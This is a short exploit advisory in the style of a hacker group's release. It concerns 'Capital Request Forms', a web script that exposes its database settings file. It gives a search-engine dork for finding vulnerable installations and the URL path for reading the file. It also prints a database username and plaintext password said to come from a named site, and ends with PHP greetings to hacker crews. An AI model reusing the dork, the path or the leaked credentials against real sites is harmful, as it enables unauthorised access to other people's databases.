Capital Request Forms Db Username and Password Vulnerabilities
##################################################################################
#
# Title : Capital Request Forms Db Username and Password Vulnerabilities
# Author : Gokhan
# Contact : gokhankaya@xxxxxxxxxxx
# Dork : inurl:common_db.inc
#
# Script : http://selfemployment.douglas.bc.ca/caprequest/
#
# ExpLoit : http://[site]/[path]/inc/common_db.inc ;)
#
#
# Code : common_db.inc
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ $dbhost = "localhost"; // DBHOST NAME +
+ $dbusername = "root"; // DB USER NAME +
+ $dbuserpassword = "sql1234"; // DB USER PASSWORD +
+ $default_dbname = "douglas"; // DB NAME +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
#
# <?php function Tesekkurler() {
# $thnx="GreetZ";
# print ("$thnx : BLaCKWHITE,CanberX,LGMAN,HackerBox.EU");
# } Tesekkurler();
# // FROM TURKEY ?>
#
#
##################################################################################